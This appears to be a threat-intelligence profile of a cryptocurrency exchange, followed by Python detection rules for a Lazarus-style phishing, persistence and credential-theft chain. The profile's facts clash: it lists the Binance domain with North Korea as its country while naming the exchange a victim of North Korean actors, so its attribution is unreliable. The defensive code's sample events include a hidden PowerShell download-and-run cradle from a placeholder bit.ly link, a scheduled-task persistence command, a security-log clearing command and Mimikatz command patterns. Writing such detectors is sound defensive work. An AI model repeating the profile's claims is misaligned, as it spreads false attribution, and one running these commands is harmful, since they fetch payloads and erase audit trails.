Cryptocurrency exchange

| Primary URL | Location (Country) | Industry |
|---|---|---|
| www[.]binance[.]com | North Korea | Financial Services |
Profile
The organisation operates a cryptocurrency exchange, with North Korea recorded as its country in the profile record above. Its core services are the trading and custody of digital assets, which places it in the high-risk financial technology sector: exchanges hold large, immediately transferable balances, so they attract sustained attention from financially motivated and state-sponsored threat actors. That targeting is evidenced by the exchange's involvement in a sophisticated intrusion attributed to North Korean state-sponsored actors, which the profile characterises as part of a broader, strategically compromised supply chain across the sector. No publicly disclosed regulatory affiliations or compliance frameworks are recorded for the organisation, which distinguishes its operating environment from that of exchanges in more tightly regulated jurisdictions.
In 2020 the Lazarus group compromised the organisation through a multi-stage intrusion. The attackers impersonated a blockchain company on LinkedIn and used that pretext to deliver a weaponised Microsoft Word document to a system administrator; the lure relied on social engineering to get the recipient to run the document's macro, which executed the initial malware. The payload established persistence through scheduled tasks (schtasks) and registry modifications, then staged custom loaders and credential-harvesting tools such as Mimikatz to obtain the credentials needed to reach financial systems. To hinder forensic analysis the operators deleted security event logs, and they distributed secondary payloads via bit.ly-shortened URLs so that the final download locations were not visible in the lure itself. The campaign's objectives centred on compromising cryptocurrency wallets and expanding access into other organisations in the sector, reflecting the exchange's exposure to supply chain attacks orchestrated by advanced persistent threats. Each stage of this chain leaves telemetry that defenders can monitor: an Office process spawning a command interpreter, schtasks /create invocations, writes to Run keys, handles opened on lsass.exe, wevtutil log clearing and Security event 1102, and URL-shortener domains in command lines.
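Detection logic for the intrusion chain described above, added here as an example; it is not part of the original profile and not code from any vendor or from the organisation. It runs a small rule set over constructed Sysmon and Windows Security events (not telemetry from the incident) that cover each stage the paragraph names: Office macro execution, schtasks and Run-key persistence, Mimikatz-style credential access, log clearing, and a bit.ly download cradle. Field names follow Sysmon's Process Create (event 1), Process Access (event 10) and Registry Value Set (event 13) events and Security event 1102; the sample paths, task name, SID and shortened URL are placeholders.

```python
"""Rule-based triage of Sysmon/Security events for the Lazarus-style chain:
Office -> interpreter, schtasks/Run-key persistence, LSASS access, log
clearing, shortened-URL download.  All sample events below are constructed."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    """Minimal event record; field names mirror the Sysmon XML fields."""
    event_id: int
    image: str = ""           # process that performed the action
    parent_image: str = ""    # Sysmon 1: parent process
    command_line: str = ""    # Sysmon 1: full command line
    target_object: str = ""   # Sysmon 13: registry value written
    target_image: str = ""    # Sysmon 10: process whose handle was opened


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
SHORTENER = re.compile(r"https?://(bit\.ly|tinyurl\.com|t\.co|goo\.gl)/\S+", re.I)
MIMIKATZ = re.compile(r"sekurlsa::|lsadump::|privilege::debug|mimikatz", re.I)
TASK_CREATE = re.compile(r"/create\b", re.I)
LOG_CLEAR = re.compile(r"\b(cl|clear-log)\s+(security|system|application)\b", re.I)

# Kill-chain stage each detection name belongs to.
STAGES = {
    "initial_access": {"office_spawned_interpreter"},
    "payload_retrieval": {"shortened_url_in_cmdline"},
    "persistence": {"schtasks_persistence", "run_key_persistence"},
    "credential_access": {"mimikatz_cmdline", "lsass_access"},
    "defense_evasion": {"log_clearing_command", "security_log_cleared"},
}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (handles / or \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: Event) -> list[str]:
    """Return the detection names a single event triggers (possibly none)."""
    hits: list[str] = []
    if ev.event_id == 1:  # Sysmon: process creation
        img, parent = _base(ev.image), _base(ev.parent_image)
        if parent in OFFICE_APPS and img in INTERPRETERS:
            hits.append("office_spawned_interpreter")
        if img == "schtasks.exe" and TASK_CREATE.search(ev.command_line):
            hits.append("schtasks_persistence")
        if img == "wevtutil.exe" and LOG_CLEAR.search(ev.command_line):
            hits.append("log_clearing_command")
        if SHORTENER.search(ev.command_line):
            hits.append("shortened_url_in_cmdline")
        if MIMIKATZ.search(ev.command_line):
            hits.append("mimikatz_cmdline")
    elif ev.event_id == 10 and _base(ev.target_image) == "lsass.exe":
        hits.append("lsass_access")      # Sysmon: handle opened on LSASS
    elif ev.event_id == 13 and RUN_KEY.search(ev.target_object):
        hits.append("run_key_persistence")
    elif ev.event_id == 1102:            # Security: "The audit log was cleared"
        hits.append("security_log_cleared")
    return hits


def triage(events: list[Event]) -> tuple[set[str], Counter]:
    """Aggregate per-event hits into (stages observed, hit counts by name)."""
    counts = Counter(h for ev in events for h in classify(ev))
    stages = {s for s, names in STAGES.items() if names & set(counts)}
    return stages, counts


# Constructed sample telemetry (placeholder paths, SID, task name and URL).
SAMPLE_EVENTS = [
    Event(1, image=r"C:\Windows\System32\cmd.exe",
          parent_image=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          command_line=r'cmd.exe /c powershell -w hidden -c "iwr https://bit.ly/example -OutFile %TEMP%\u.exe; %TEMP%\u.exe"'),
    Event(1, image=r"C:\Windows\System32\schtasks.exe", parent_image=r"C:\Windows\System32\cmd.exe",
          command_line=r'schtasks /create /sc onlogon /tn "OfficeUpdate" /tr "C:\Users\admin\AppData\Local\Temp\u.exe"'),
    Event(13, image=r"C:\Users\admin\AppData\Local\Temp\u.exe",
          target_object=r"HKU\S-1-5-21-1001\Software\Microsoft\Windows\CurrentVersion\Run\OfficeUpdate"),
    Event(10, image=r"C:\Users\admin\AppData\Local\Temp\u.exe", target_image=r"C:\Windows\System32\lsass.exe"),
    Event(1, image=r"C:\Windows\System32\wevtutil.exe", parent_image=r"C:\Windows\System32\cmd.exe",
          command_line="wevtutil cl Security"),
    Event(1102),
    Event(1, image=r"C:\Windows\System32\notepad.exe", parent_image=r"C:\Windows\explorer.exe",
          command_line="notepad.exe notes.txt"),  # benign control: triggers nothing
]

if __name__ == "__main__":
    stages, counts = triage(SAMPLE_EVENTS)
    print("stages observed:", sorted(stages))
    print("hits:", dict(counts))
```

The `lsass_access` rule is the noisy one in practice: AV and EDR agents open LSASS constantly, so a production version filters on the requesting `SourceImage` and on the `GrantedAccess` mask rather than alerting on every handle. The value of the stage aggregation in `triage` is that a single host showing three or more of these stages within a short window is a much stronger signal than any one rule on its own.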
